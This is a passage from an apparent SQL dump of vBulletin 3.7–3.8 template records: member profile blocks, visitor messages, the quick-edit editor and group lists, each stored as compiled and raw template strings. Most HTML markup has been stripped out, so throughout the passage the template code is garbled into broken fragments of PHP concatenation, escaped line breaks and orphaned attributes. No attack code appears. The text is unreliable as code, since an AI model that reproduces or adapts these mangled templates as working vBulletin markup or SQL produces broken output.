    • $vbphrase[total_albums]: $block_data[albumcount]
    • \r\n
    • $vbphrase[total_pictures]: $block_data[picturecount]
    • \r\n
    • $vbphrase[albums_created_by_x]
    • \r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n $vbphrase[visitor_messages]\r\n \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[user_notes]\r\n \r\n
    \r\n
    \r\n\r\n $template_hook[profile_stats_pregeneral]\r\n\r\n
    \r\n $vbphrase[general_information]\r\n
      \r\n \r\n
    • $vbphrase[last_activity]: $prepared[lastactivitydate] $prepared[lastactivitytime]
    • \r\n
      \r\n \r\n
    • $vbphrase[current_activity]: $prepared[action] $prepared[where]
    • \r\n
      \r\n
    • $vbphrase[join_date]: $prepared[joindate]
    • \r\n
    • $vbphrase[referrals]: $prepared[referrals]
    • \r\n \r\n
    • $vbphrase[home_page]: $prepared[homepage]
    • \r\n
      \r\n
    \r\n
    \r\n\r\n $template_hook[profile_stats_last]\r\n
    ', 'template', 1203448672, 'vBulletin Solutions', '3.7.0 Beta 6', 'vbulletin'), (1372, -1, 'memberinfo_block_visitormessaging', '\".((($show[\'quickcomment\'] AND $show[\'post_visitor_message\']) OR $show[\'hasedit\']) ? (\"\r\n $block_data[clientscript]\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'quickcomment\'] AND $show[\'post_visitor_message\']) ? (\"\r\n
    \r\n
    session->vars[\'sessionurl\'] . \"do=message\\\" method=\\\"post\\\" name=\\\"vbform\\\" id=\\\"message_form\\\">\r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    $vbphrase[errors_occured_when_submitted]
    \r\n
     
    \r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    $block_data[messagearea]
    \r\n \".(($block_data[\'allowed_bbcode\']) ? (\"
    $block_data[allowed_bbcode]
    \") : (\"\")).\"\r\n
    \r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n userinfo[\'userid\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \\\"$vbphrase[posting_comment]\r\n $vbphrase[posting_message_please_wait]\r\n
    \r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n\".(($block_data[\'messagebits\']) ? (\"\r\n
    \r\n \".(($show[\'inlinemod\']) ? (\" \") : (\"\")).\"\r\n \" . construct_phrase(\"$vbphrase[showing_vms_x_to_y_of_z]\", \"$block_data[messagestart]\", \"$block_data[messageend]\", \"$prepared[vm_total]\") . \"\r\n
    \r\n \r\n\".(($show[\'inlinemod\']) ? (\"\r\n
    \r\n\") : (\"\")).\"\r\n
      \r\n $block_data[messagebits]\r\n
    \r\n\r\n \".(($show[\'inlinemod\'] OR $block_data[\'pagenav\']) ? (\"\r\n
    \r\n \r\n \r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($block_data[\'pagenav\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n
    \r\n
    \r\n \r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n
    \r\n $block_data[pagenav]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'quickcomment\']) ? (\"\r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n\".(($block_data[\'messagebits\']) ? (\"\r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n\r\n
    \r\n \r\n\r\n \r\n
      \r\n
    • $vbphrase[from_this_page]
    • \r\n
    • $vbphrase[select_all]
    • \r\n
    • $vbphrase[deselect_all]
    • \r\n
    • $vbphrase[invert_selection]
    • \r\n \".(($show[\'approve\'] OR $show[\'undelete\']) ? (\"
    • options[\'cleargifurl\'] . \"\\\" alt=\\\"\\\" width=\\\"1\\\" height=\\\"1\\\" />
    • \") : (\"\")).\"\r\n \".(($show[\'approve\']) ? (\"
    • $vbphrase[select_unapproved_posts]
    • \") : (\"\")).\"\r\n \".(($show[\'undelete\']) ? (\"
    • $vbphrase[select_deleted_posts]
    • \") : (\"\")).\"\r\n
    \r\n \r\n \") : (\"\")).\"\r\n\") : (\"\r\n \".(($block_data[\'fromconverse\']) ? (\"\r\n
    $vbphrase[no_visitor_messages_between_members]
    \r\n \") : (\"\r\n
    \" . construct_phrase(\"$vbphrase[x_has_no_visitor_messages]\", \"$prepared[username]\") . \"
    \r\n \")).\"\r\n\")).\"\r\n\r\n\".(($show[\'hasedit\'] AND $show[\'popups\']) ? (\"\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n $vbphrase[vbulletin_message]\r\n
     
    $vbphrase[cancel_changes]
    \r\n\r\n\") : (\"\")).\"', '\r\n $block_data[clientscript]\r\n\r\n\r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    $vbphrase[errors_occured_when_submitted]
    \r\n
     
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[view_your_conversation_with_x]\r\n $vbphrase[message]:\r\n
    \r\n
    $block_data[messagearea]
    \r\n
    $block_data[allowed_bbcode]
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \"$vbphrase[posting_comment]\r\n $vbphrase[posting_message_please_wait]\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n  \r\n $vbphrase[showing_vms_x_to_y_of_z]\r\n
    \r\n \r\n\r\n
    \r\n\r\n
      \r\n $block_data[messagebits]\r\n
    \r\n\r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $block_data[pagenav]\r\n
    \r\n
    \r\n
    \r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n\r\n \r\n
      \r\n
    • $vbphrase[from_this_page]
    • \r\n
    • $vbphrase[select_all]
    • \r\n
    • $vbphrase[deselect_all]
    • \r\n
    • $vbphrase[invert_selection]
    • \r\n
    • \"\"
    • \r\n
    • $vbphrase[select_unapproved_posts]
    • \r\n
    • $vbphrase[select_deleted_posts]
    • \r\n
    \r\n \r\n
    \r\n\r\n \r\n
    $vbphrase[no_visitor_messages_between_members]
    \r\n \r\n
    $vbphrase[x_has_no_visitor_messages]
    \r\n
    \r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n $vbphrase[vbulletin_message]\r\n
     
    $vbphrase[cancel_changes]
    \r\n\r\n
    ', 'template', 1280529003, 'vBulletin Solutions', '3.8.7 Beta 1', 'vbulletin'), (1373, -1, 'memberinfo_css', '', '', 'template', 1207049926, 'vBulletin Solutions', '3.7.0 Release Candidate 2', 'vbulletin'), (1374, -1, 'memberinfo_customfield_edit', '
    \r\n
    \r\n
    \r\n $custom_field_holder\r\n
    \r\n \\\"$vbphrase[errors]\\\"\r\n \r\n
    \r\n
    \r\n \\\"\\\"\r\n \r\n \r\n
    \r\n
    \r\n
    \r\n
    ', '
    \r\n
    \r\n
    \r\n $custom_field_holder\r\n
    \r\n \"$vbphrase[errors]\"\r\n \r\n
    \r\n
    \r\n \"\"\r\n \r\n \r\n
    \r\n
    \r\n
    \r\n
    ', 'template', 1196331036, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1375, -1, 'memberinfo_deletemessages', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[delete_messages]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n
    \r\n \".(($show[\'deleteoption\']) ? (\"\r\n
    $vbphrase[how_would_you_like_to_delete]
    \r\n \") : (\"\")).\"\r\n \".(($show[\'deletemessages\']) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'removemessages\']) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'deletemessages\']) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n
    \" . construct_phrase(\"$vbphrase[deleting_x_messages_from_y_user_profiles]\", \"$messagecount\", \"$usercount\") . \"
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $pagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[delete_messages]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n
    \r\n \r\n
    $vbphrase[how_would_you_like_to_delete]
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    $vbphrase[deleting_x_messages_from_y_user_profiles]
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208875871, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1376, -1, 'memberinfo_imbit', '
  • \r\n \".((!$show[\'textimicons\']) ? (\"$imicon\") : (\"\")).\"\r\n $imtitle\r\n $imusername\r\n
  • ', '
  • \r\n $imicon\r\n $imtitle\r\n $imusername\r\n
  • ', 'template', 1207049941, 'vBulletin Solutions', '3.7.0 Release Candidate 2', 'vbulletin'), (1377, -1, 'memberinfo_infractionbit', '\r\n \\\"\\\"\r\n \r\n
    \r\n \".(($infraction[postid]) ? (\"\r\n \".(($show[\'postdeleted\']) ? (\"\r\n $vbphrase[n_a]\r\n \") : (\"\".(($show[\'threadtitle\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"p=$infraction[postid]#post$infraction[postid]\\\">$infraction[title]\r\n \") : (\"\r\n $vbphrase[private]\r\n \")).\"\")).\"\r\n \") : (\"\r\n \".(($infraction[\'points\']) ? (\"\r\n $vbphrase[profile_infraction]\r\n \") : (\"\r\n $vbphrase[profile_warning]\r\n \")).\"\r\n \")).\"\r\n
    \r\n
    $vbphrase[reason]: $infraction[reason]
    \r\n \r\n \r\n $infraction[dateline] $infraction[timeline]\r\n \" . construct_phrase(\"$vbphrase[by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$infraction[whoadded]\", \"$infraction[username]\") . \"\r\n \r\n \r\n $infraction[points] /\r\n \".(($show[\'reversed\']) ? (\"\r\n $vbphrase[reversed]\r\n \") : (\"\".(($show[\'expired\']) ? (\"\r\n $vbphrase[expired]\r\n \") : (\"\".(($show[\'neverexpires\']) ? (\"\r\n $vbphrase[never]\r\n \") : (\"\r\n $infraction[expires_dateline] $infraction[expires_timeline]\r\n \")).\"\")).\"\")).\"\r\n \r\n \".(($show[\'reverse\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=view&infractionid=$infraction[infractionid]\\\">$vbphrase[view]\r\n \") : (\"\")).\"\r\n\r\n', '\r\n \"\"\r\n \r\n
    \r\n \r\n \r\n $vbphrase[n_a]\r\n \r\n $infraction[title]\r\n \r\n $vbphrase[private]\r\n \r\n \r\n \r\n $vbphrase[profile_infraction]\r\n \r\n $vbphrase[profile_warning]\r\n \r\n \r\n
    \r\n
    $vbphrase[reason]: $infraction[reason]
    \r\n \r\n \r\n $infraction[dateline] $infraction[timeline]\r\n $vbphrase[by_x]\r\n \r\n \r\n $infraction[points] /\r\n \r\n $vbphrase[reversed]\r\n \r\n $vbphrase[expired]\r\n \r\n $vbphrase[never]\r\n \r\n $infraction[expires_dateline] $infraction[expires_timeline]\r\n \r\n \r\n \r\n $vbphrase[view]\r\n \r\n\r\n', 'template', 1202405906, 'vBulletin Solutions', '3.7.0 Beta 5', 'vbulletin'), (1378, -1, 'memberinfo_membergroupbit', '
    $usergroup[opentag]$usergroup[title]$usergroup[closetag]\".(($usergroup[description]) ? (\":\") : (\"\")).\"
    \r\n
    $usergroup[description]
    \r\n', '
    $usergroup[opentag]$usergroup[title]$usergroup[closetag]:
    \r\n
    $usergroup[description]
    \r\n', 'template', 1176907884, 'vBulletin Solutions', '3.6.6', 'vbulletin'), (1379, -1, 'memberinfo_profilefield', '\".(($show[\'profilefield_edit\']) ? (\"\r\n
    $profilefield[title]
    \r\n
    \r\n $profilefield[value]\r\n \r\n
    \r\n\") : (\"\r\n
    $profilefield[title]
    \r\n
    $profilefield[value]
    \r\n\")).\"', '\r\n
    $profilefield[title]
    \r\n
    \r\n $profilefield[value]\r\n \r\n
    \r\n\r\n
    $profilefield[title]
    \r\n
    $profilefield[value]
    \r\n
    ', 'template', 1195134289, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1380, -1, 'memberinfo_profilefield_category', '\".(($show[\'profile_category_title\']) ? (\"\r\n
  • $category[title]\r\n \".(($category[\'description\']) ? (\"
    $category[description]
    \") : (\"\")).\"\r\n
    \r\n $category[fields]\r\n
    \r\n
  • \r\n\") : (\"\r\n
    \r\n $category[fields]\r\n
    \r\n\")).\"', '\r\n
  • $category[title]\r\n
    $category[description]
    \r\n
    \r\n $category[fields]\r\n
    \r\n
  • \r\n\r\n
    \r\n $category[fields]\r\n
    \r\n
    ', 'template', 1194528605, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1381, -1, 'memberinfo_publicgroupbit', '
  • $usergroup[opentag]$usergroup[title]$usergroup[closetag]
  • ', '
  • $usergroup[opentag]$usergroup[title]$usergroup[closetag]
  • ', 'template', 1218471272, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1382, -1, 'memberinfo_quickedit', '\".(($show[\'quick_edit_form_tag\']) ? (\"
    \") : (\"\")).\"\r\n\r\n\r\n\r\n \r\n\r\n
    \r\n \".(($show[\'editor_toolbar\']) ? (\"\r\n
    \r\n \r\n \r\n \r\n \".(($show[\'basic_bbcode\']) ? (\"\r\n \r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'color_bbcode\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'url_bbcode\'] OR $show[\'img_bbcode\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'url_bbcode\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'img_bbcode\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'quote_bbcode\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \".((!is_browser(\'opera\')) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".((is_browser(\'ie\')) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n \".(($show[\'wysiwyg_compatible\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n
    \\\"$vbphrase[remove_text_formatting]\\\"
    \\\"\\\"
    \\\"$vbphrase[bold]\\\"
    \\\"$vbphrase[italic]\\\"
    \\\"$vbphrase[underline]\\\"
    \\\"\\\"
    \r\n \r\n \r\n \r\n \r\n \r\n
    \\\"\\\"
    options[\'cleargifurl\'] . \"\\\" id=\\\"{$editorid}_color_bar\\\" alt=\\\"\\\" style=\\\"background-color:black\\\" width=\\\"21\\\" height=\\\"4\\\" />
    \\\"\\\"
    \r\n
    \\\"\\\"
    \\\"$vbphrase[insert_link]\\\"
    \\\"$vbphrase[insert_image]\\\"
    \\\"\\\"
    \\\"$vbphrase[wrap_quote_tags]\\\"
     \\\"\\\"
    \\\"$vbphrase[check_spelling]\\\"
    \r\n
    \\\"\\\"
    \r\n
    \\\"\\\"
    \r\n
    \\\"\\\"
    \\\"$vbphrase[switch_editor_mode]\\\"
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n
    \r\n
    $vbphrase[reason_for_editing]:
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \\\"$vbphrase[posting_message_please_wait]\\\"\r\n \r\n \r\n \".(($show[\'deletepostoption\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n
    \r\n\r\n \r\n\r\n \".(($show[\'deletepostoption\']) ? (\"\r\n
    \r\n\r\n
    \r\n\r\n
    \r\n
    $vbphrase[delete_message_check_appropriate_option]
    \r\n \".(($show[\'firstpostnote\']) ? (\"\r\n
    $vbphrase[deleting_message_deletion_of_thread]
    \r\n \") : (\"\")).\"\r\n
    \r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n
    \r\n
    \r\n \r\n
    \r\n \".(($show[\'softdeleteoption\']) ? (\"\r\n
    \r\n \r\n \".(($show[\'physicaldeleteoption\'] AND $show[\'keepattachmentsoption\']) ? (\"()\") : (\"\")).\"\r\n
    \r\n \") : (\"\")).\"\r\n \".(($show[\'physicaldeleteoption\']) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n\r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n\r\n\".(($show[\'quick_edit_form_tag\']) ? (\"
    \") : (\"\")).\"', '
    \r\n\r\n\r\n\r\n \r\n\r\n
    \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \"$vbphrase[remove_text_formatting]\"
    \"\"
    \"$vbphrase[bold]\"
    \"$vbphrase[italic]\"
    \"$vbphrase[underline]\"
    \"\"
    \r\n \r\n \r\n \r\n \r\n \r\n
    \"\"
    \"\"
    \"\"
    \r\n
    \"\"
    \"$vbphrase[insert_link]\"
    \"$vbphrase[insert_image]\"
    \"\"
    \"$vbphrase[wrap_quote_tags]\"
     \"\"
    \"$vbphrase[check_spelling]\"
    \r\n
    \"\"
    \r\n
    \"\"
    \r\n
    \"\"
    \"$vbphrase[switch_editor_mode]\"
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n
    $vbphrase[reason_for_editing]:
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \"$vbphrase[posting_message_please_wait]\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n\r\n \r\n\r\n \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n
    $vbphrase[delete_message_check_appropriate_option]
    \r\n \r\n
    $vbphrase[deleting_message_deletion_of_thread]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n \r\n ()\r\n
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    ', 'template', 1212070154, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1383, -1, 'memberinfo_small', '
  • \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n
    \r\n \".(($show[\'breakfriendship\']) ? (\"session->vars[\'sessionurl\'] . \"do=removelist&userlist=friend&u=$remove[userid]&r=$remove[return]\\\">$vbphrase[break_friendship]\") : (\"\")).\"\r\n
      \r\n \".(($user[\'onlinestatus\']) ? (\"
    • $user[onlinestatus]
    • \") : (\"\")).\"\r\n \".(($GLOBALS[\'vbulletin\']->options[\'showimicons\']) ? (\"\r\n \".(($user[\'showicq\']) ? (\"
    • $user[icqicon]
    • \") : (\"\")).\"\r\n \".(($user[\'showmsn\']) ? (\"
    • $user[msnicon]
    • \") : (\"\")).\"\r\n \".(($user[\'showaim\']) ? (\"
    • $user[aimicon]
    • \") : (\"\")).\"\r\n \".(($user[\'showyahoo\']) ? (\"
    • $user[yahooicon]
    • \") : (\"\")).\"\r\n \".(($user[\'showskype\']) ? (\"
    • $user[skypeicon]
    • \") : (\"\")).\"\r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n
  • ', '
  • \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n $vbphrase[break_friendship]\r\n
      \r\n
    • $user[onlinestatus]
    • \r\n \r\n
    • $user[icqicon]
    • \r\n
    • $user[msnicon]
    • \r\n
    • $user[aimicon]
    • \r\n
    • $user[yahooicon]
    • \r\n
    • $user[skypeicon]
    • \r\n
      \r\n
    \r\n
    \r\n
  • ', 'template', 1196500122, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1384, -1, 'memberinfo_socialgroupbit', '
  • ', '
  • \r\n \"$socialgroup[shortdescription]\"\r\n \r\n
  • ', 'template', 1226661608, 'vBulletin Solutions', '3.8.0 Beta 3', 'vbulletin'), (1385, -1, 'memberinfo_socialgroupbit_text', '
  • \".(($showgrouplink) ? (\"session->vars[\'sessionurl\'] . \"groupid=$socialgroup[groupid]\\\">\") : (\"\")).\"$socialgroup[name_html]\".(($showgrouplink) ? (\"\") : (\"\")).\"
  • ', '
  • $socialgroup[name_html]
  • ', 'template', 1227787487, 'vBulletin Solutions', '3.8.0 Release Candidate 1', 'vbulletin'), (1386, -1, 'memberinfo_tiny', '
  • \r\n\".(($user[\'avatarurl\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"u=$user[userid]\\\">\\\"$user[username]\\\"\".(($user[\'avatarwidth\'])\r\n\") : (\"\")).\"\r\n \r\n
  • ', '
  • \r\n\r\n \"$user[username]\"<if width=\"$user[avatarwidth]\" height=\"$user[avatarheight]\" border=\"0\" class=\"alt2\" />\r\n\r\n \r\n
  • ', 'template', 1198251924, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'), (1387, -1, 'memberinfo_usercss', '', '', 'template', 1197372270, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1388, -1, 'memberinfo_visitorbit', '
  • session->vars[\'sessionurl\'] . \"u=$user[userid]\\\">$user[musername]$user[invisiblemark]$user[buddymark]
  • ', '
  • $user[musername]$user[invisiblemark]$user[buddymark]
  • ', 'template', 1196282951, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1389, -1, 'memberinfo_visitormessage', '
  • \r\n\".(($message[\'avatarurl\']) ? (\"\r\n \r\n
    \r\n\") : (\"\")).\"\r\n
    \r\n
    \r\n \".(($show[\'inlinemod\']) ? (\"\") : (\"\")).\"\r\n
    $message[date]\".((!$show[\'detailedtime\']) ? (\" $message[time]\") : (\"\")).\"
    \r\n \".(($message[\'postuserid\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"u=$message[postuserid]\\\" class=\\\"smallfont username\\\">$message[musername]\r\n \") : (\"\r\n $message[musername]\r\n \")).\"\r\n \".(($show[\'profile\']) ? (\"\r\n
    \" . construct_phrase(\"$vbphrase[profile_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$message[profileuserid]&vmid=$message[vmid]#vmessage$message[vmid]\", \"$message[profileusername]\") . \"
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n \".(($show[\'moderation\']) ? (\"
    $vbphrase[this_message_is_moderated]
    \") : (\"\")).\"\r\n
    $message[message]
    \r\n\r\n \".(($show[\'converse\'] OR $show[\'edit\'] OR $show[\'reportlink\'] OR $message[\'messageipaddress\']) ? (\"\r\n \".(($show[\'edit\']) ? (\"\r\n \\\"$vbphrase[loading_editor_please_wait]\\\"\r\n \") : (\"\")).\"\r\n \r\n \") : (\"\")).\"\r\n\".(($message[\'avatarurl\']) ? (\"\r\n
    \r\n\") : (\"\")).\"\r\n \r\n
  • ', '
  • \r\n\r\n \r\n
    \r\n\r\n
    \r\n
    \r\n \r\n
    $message[date] $message[time]
    \r\n \r\n $message[musername]\r\n \r\n $message[musername]\r\n \r\n \r\n
    $vbphrase[profile_x]
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    $vbphrase[this_message_is_moderated]
    \r\n
    $message[message]
    \r\n\r\n \r\n \r\n \"$vbphrase[loading_editor_please_wait]\"\r\n \r\n \r\n \r\n\r\n
    \r\n
    \r\n \r\n
  • ', 'template', 1212070314, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1390, -1, 'memberinfo_visitormessage_deleted', '
  • \r\n
    \r\n
    \r\n \".(($show[\'inlinemod\']) ? (\"\") : (\"\")).\"\r\n
    $message[date]\".((!$show[\'detailedtime\']) ? (\" $message[time]\") : (\"\")).\"
    \r\n \".(($message[\'postuserid\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"u=$message[postuserid]\\\" class=\\\"smallfont username\\\">$message[musername]\r\n \") : (\"\r\n $message[musername]\r\n \")).\"\r\n\r\n \".(($show[\'profile\']) ? (\"\r\n
    \" . construct_phrase(\"$vbphrase[profile_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$message[profileuserid]&vmid=$message[vmid]#vmessage$message[vmid]\", \"$message[profileusername]\") . \"
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n \".(($show[\'deleted\']) ? (\"
    $message[message]

    \") : (\"\")).\"\r\n\r\n
    \r\n \" . construct_phrase(\"$vbphrase[message_deleted_by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$message[del_userid]\", \"$message[del_username]\") . \"\r\n \".(($message[\'del_reason\']) ? (\"$vbphrase[reason] $message[del_reason]\") : (\"\")).\"\r\n
    \r\n\r\n \".(($show[\'edit\'] OR $show[\'reportlink\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n
  • ', '
  • \r\n
    \r\n
    \r\n \r\n
    $message[date] $message[time]
    \r\n \r\n $message[musername]\r\n \r\n $message[musername]\r\n \r\n\r\n \r\n
    $vbphrase[profile_x]
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    $message[message]

    \r\n\r\n
    \r\n $vbphrase[message_deleted_by_x]\r\n $vbphrase[reason] $message[del_reason]\r\n
    \r\n\r\n \r\n \r\n \r\n
  • ', 'template', 1219145139, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1391, -1, 'memberinfo_visitormessage_global_ignored', '
  • \r\n
    \r\n
    \r\n \".(($show[\'inlinemod\']) ? (\"\") : (\"\")).\"\r\n
    $message[date]\".((!$show[\'detailedtime\']) ? (\" $message[time]\") : (\"\")).\"
    \r\n session->vars[\'sessionurl\'] . \"u=$message[postuserid]\\\" class=\\\"smallfont username\\\">$message[musername]\r\n\r\n \".(($show[\'profile\']) ? (\"\r\n
    \" . construct_phrase(\"$vbphrase[profile_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$message[profileuserid]&vmid=$message[vmid]#vmessage$message[vmid]\", \"$message[profileusername]\") . \"
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\".(($show[\'conversepage\']) ? (\"\r\n \r\n\") : (\"\r\n \r\n\")).\"\r\n
    \r\n\r\n \" . construct_phrase(\"$vbphrase[administrator_decided_x_quiet]\", \"$message[username]\", \"profile.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=ignorelist\") . \"\r\n
    \r\n
  • ', '
  • \r\n
    \r\n
    \r\n \r\n
    $message[date] $message[time]
    \r\n $message[musername]\r\n\r\n \r\n
    $vbphrase[profile_x]
    \r\n
    \r\n
    \r\n
    \r\n\r\n \r\n\r\n \r\n\r\n
    \r\n\r\n $vbphrase[administrator_decided_x_quiet]\r\n
    \r\n
  • ', 'template', 1210244767, 'vBulletin Solutions', '3.7.1', 'vbulletin'), (1392, -1, 'memberinfo_visitormessage_ignored', '
  • \r\n
    \r\n
    \r\n \".(($show[\'inlinemod\']) ? (\"\") : (\"\")).\"\r\n
    $message[date]\".((!$show[\'detailedtime\']) ? (\" $message[time]\") : (\"\")).\"
    \r\n session->vars[\'sessionurl\'] . \"u=$message[postuserid]\\\" class=\\\"smallfont username\\\">$message[musername]\r\n\r\n \".(($show[\'profile\']) ? (\"\r\n
